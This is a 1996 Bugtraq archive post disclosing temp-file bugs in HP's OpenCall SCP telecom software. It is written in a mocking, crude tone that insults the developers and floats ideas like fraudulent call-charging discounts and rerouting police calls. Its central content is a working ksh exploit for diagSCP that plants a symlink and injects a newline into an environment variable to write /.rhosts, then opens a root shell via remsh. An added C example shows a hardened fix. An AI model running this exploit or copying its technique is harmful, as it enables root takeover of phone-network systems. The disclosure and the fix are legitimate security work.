Bugtraq mailing list archives

Other Folks Scripts


From: aleph1 () dfw net (Aleph One)
Date: Mon, 9 Dec 1996 02:50:35 -0600


   Guest Scriptor: Otto Sync
   Exploit: OpenCall platform bug
   Shout out: Thanks, Otto, we couldn't have said it better ourselves!

   Sure you all see Hewlett Packard as the pure American company, and you
   blame all these Yankee coders for the bugs that we see here week after
   week. Big mistake! Stupidity is evenly distributed. Today we're going
   to investigate the French arm of HP, located in Grenoble in the Alps,
   in this division where the most elite products come from: the
   Telecommunication Network Organisation. Hello to all the Grenoblois!
   Near the mountains are developed products such as their IN
   (Intelligent Network) platforms, and the OpenCall SCP software is
   being written by half-drunk French skiers who thought HP stands for
   "Habitation Prolongée" (long term accommodation). Seriously, lay off
   the alcohol at lunchtime, switch off that Minitel connected to 3615
   ANALSEX and think of all those Operators put at risk by your dubious
   programming practices.

   Shall we tell you that HP delivers their IN platform with umask 000 as
   a default and doesn't see this as a problem? The idiots! Do you want to
   know how some of their log files keep being 666 and want to overwrite
   any of root's files? Yes, yes, it's true! No, let's deal with
   something more fancy; the guys at SOD would be disappointed to see
   such trivial exploits. They have more than one trick up their sleeve,
   those damned scriptors.

   While I'm here as a guest scriptor, one word for HP executives and
   lawyers. Yes, even those in Grenoble who think they concentrate all of
   human intelligence in a single place. Make the SOD guys a decent
   offer, give them some contract work to start with, maybe a nice
   package with a Maserati company car and one all-year ski pass. OK,
   fine, it can be a French car, but not a Citroën. Think about all the
   unreleased bugs! Think about your children! Think about endangered
   species! Be reasonable, surely you can find them a nice warm little
   spot with a view of Mont Blanc. The survival of humanity is at stake.

   Let's get back to the bug, if you don't mind. All right, it's not every
   day that you come across an SCP, but remember that most phone network
   operators have or will have one. And when you know that this gentle
   highly available system can control every signalling message at various
   detection points in the call model, you start to wonder. What about
   creating a special IN service that entitles all your outgoing calls to
   a 99% charging discount? Would you have fun rerouting all calls
   directed at the police station to HP's helpdesk? Do you finally realise
   that your slapdash code endangers the stability of the networks it is
   installed on?

   Have a look at the code. It's self-explanatory. Use at other people's
   risk.
     _________________________________________________________________
BUG1: diagSCP

Synopsis
========

The diagSCP utility creates a temporary directory in /tmp with a predictable
name.  It will also happily follow any evil symlink you put in. The 'env' file
created by diagSCP in this directory contains the user's environment and is
thus subject to customization.  We just have to insert some ^J in a variable
to have it go to the next line, so it looks like a valid entry in .rhosts.

Exploit
=======

#!/bin/ksh
FILE=/.rhosts
NEXT=`expr $$ + 5`
mkdir /tmp/diagSCP.$NEXT
ln -s $FILE /tmp/diagSCP.$NEXT/env
export GUESSWHAT="
localhost `whoami`"
diagSCP &
sleep 2
kill $NEXT
echo "\nFrench kiss ? root kiss !\n"
remsh localhost -l root ksh -i


Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
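As an added illustration from the fixing side (my code, not the post's script nor HP's diagSCP source), this is how a utility like diagSCP could create its temporary directory and 'env' file so that none of the conditions in the synopsis holds: mkdtemp() makes the name unpredictable, O_EXCL|O_NOFOLLOW refuses a pre-planted symlink instead of following it, the explicit 0600 mode does not depend on a umask 000 default, and CR/LF inside a variable are escaped so it cannot become an extra line. Function names are mine, and the code assumes a POSIX.1-2008 libc such as glibc rather than the 1996 HP-UX environment.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

extern char **environ;

/* Escape CR/LF in one "NAME=value" string so a single variable cannot
 * smuggle a second line into the dump. Returns the length written. */
size_t escape_newlines(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    for (; *in && n + 2 < outlen; in++) {
        if (*in != '\n' && *in != '\r') { out[n++] = *in; continue; }
        out[n++] = '\\';
        out[n++] = (*in == '\n') ? 'n' : 'r';
    }
    out[n] = '\0';
    return n;
}

/* Create dir/env: O_EXCL refuses a pre-existing file, O_NOFOLLOW refuses
 * a planted symlink, and the explicit 0600 mode ignores the umask. */
int create_env_file(const char *dir)
{
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0) return -1;
    int fd = openat(dfd, "env", O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    close(dfd);
    return fd;   /* -1 with errno EEXIST/ELOOP when something was planted */
}

/* Dump the environment under an unpredictable mkdtemp() directory.
 * Copies the directory path to dirbuf; returns 0 on success, -1 on error. */
int dump_environment(char *dirbuf, size_t dirlen)
{
    char tmpl[] = "/tmp/diagSCP.XXXXXX", esc[4096];
    if (mkdtemp(tmpl) == NULL) return -1;
    int fd = create_env_file(tmpl);
    if (fd < 0) return -1;
    FILE *fp = fdopen(fd, "w");
    for (char **e = environ; *e; e++) {   /* one escaped line per variable */
        escape_newlines(*e, esc, sizeof esc);
        fprintf(fp, "%s\n", esc);
    }
    fclose(fp);
    snprintf(dirbuf, dirlen, "%s", tmpl);
    return 0;
}
```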


